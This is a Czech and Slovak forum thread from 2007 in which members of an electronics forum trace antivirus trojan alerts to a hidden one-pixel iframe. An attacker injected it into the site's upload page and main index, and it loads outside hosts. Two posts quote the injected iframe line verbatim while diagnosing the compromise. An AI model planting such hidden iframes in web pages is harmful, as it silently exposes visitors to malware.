Stránka 1 z 4
Trojskej kun
Napsal: 29 kvě 2007, 13:47
od ccarloss
Klepnul jsem na upload a pc mi ohlasil trojskeho kone
mam NOD32
Napsal: 29 kvě 2007, 13:52
od MetalGod
Už o tom byla zmínka tady:
http://www.ebastlirna.cz/modules.php?na ... ght=#80322
A koukám, že se to ještě nevyřešilo
Napsal: 29 kvě 2007, 13:53
od Radix
Pořiď si Linux.
Teď zkouším skvělého Sama.
Napsal: 29 kvě 2007, 14:40
od Raptor181
WIN XP, NOD32 a ziadny konik, ani pejko...
Napsal: 29 kvě 2007, 14:47
od meno
Ja mám NOD32 a AVG a nehlási mi to nič
Napsal: 29 kvě 2007, 15:18
od galjo
ani DrWeb nič nehlásí.... A sem tam mi aj klúč z cracku uprace do archivu...
Napsal: 29 kvě 2007, 15:36
od MetalGod
Tak už asi ten problém (jak pro koho
) vyřešili.
Ale pokud se někomu z vás po tom oři z Tróje stejská, nechť mi napíše- mám ho staženej na ploše
Napsal: 29 kvě 2007, 16:17
od ZdenekHQ
Už to vidím, je to na konci stránky nekorektně přilepený za /html -někdo to přidal do php kódu, co generuje stránku uploadu. Použil zřejmě script, co přidá cokoliv na konec souboru.
Kód: Vybrat vše
iframe src='http://zaebiz.awardspace.com' width='1' height='1' style='visibility: hidden;'></iframe>
Je potřeba to ručně otevřít na serveru a smazat.
Vám, co to hlásí virus, máte předpokládám jako prohlížeč IE ?
Napsal: 29 kvě 2007, 16:48
od meno
Já mam Firefoxa a nič nehlási , dúfam že už toho Trójana nemám na disku
Ale ak tam je tak by ho už mohol za tie 2dni aj niekto odstrániť !!! Nech sa zbytočne nešíri všelijaká haveď !!!
Napsal: 29 kvě 2007, 16:51
od ZdenekHQ
Já mám taky FF a jelikož předpokládám, že se chová korektně, tak všechno za koncovou značkou html ignoruje. Navíc antivir mlčí a žádný nový port se mě neotevřel ani se neobjevil nový proces "na pozadí".
Napsal: 29 kvě 2007, 16:58
od MetalGod
meno píše:Já mam Firefoxa a nič nehlási , dúfam že už toho Trójana nemám na disku
Já to na hadrdüsku mám, dokonce přímo na ploše.
Nechce toho koníka někdo poslat? Je to má poslední nabídka!
Napsal: 01 čer 2007, 10:03
od ZdenekHQ
No - a teď ten blbec už rozvrtal i hlavní index a kdoví co ješte.
Myslím si, že pokud hlavní admin nemá čas se o fórum starat, tak má předat heslo od FTP a ostatní někomu, kdo na to čas má a taky občas zalátá nějakou tu bezpečnostní díru. Zatím se to nestalo ani u té staré.
Až spadne i databáze, bude celá bastlírna víte kde !
Napsal: 01 čer 2007, 10:19
od Crifodo
po připojení na domovskou stránku Bastlírny mám ve zdrojovém kódu stránky
<!-- ~ --><iframe src='http://zaebiz.freehostia.com' width='1' height='1' style='visibility: hidden;'></iframe><!-- ~ -->
něco tu zapáchá...
Napsal: 01 čer 2007, 10:36
od ZdenekHQ
No jo, blboun zkouší nakazit všechny soubory a ujela mu ruka, takže index přepsal. Je potřeba se dostat na FTP, podívat se, jestli tam nemá vlastní uploadovací script nebo používá administraci - a každopádně ho zavčas zlikvidovat, než sejme databázi. Zatím si jenom hraje, tohle profi útok není.
Napsal: 01 čer 2007, 10:57
od Crifodo
ZdenekHQ píše:No jo, blboun zkouší nakazit všechny soubory a ujela mu ruka, takže index přepsal. Je potřeba se dostat na FTP, podívat se, jestli tam nemá vlastní uploadovací script nebo používá administraci - a každopádně ho zavčas zlikvidovat, než sejme databázi. Zatím si jenom hraje, tohle profi útok není.
napřed by to chtělo ho identifikovat, to snad nebude pro admina nemožné.
Pak zveřejnit a nakonec uspořádat trestnou výpravu.
Rád věnuju kastrovací nožík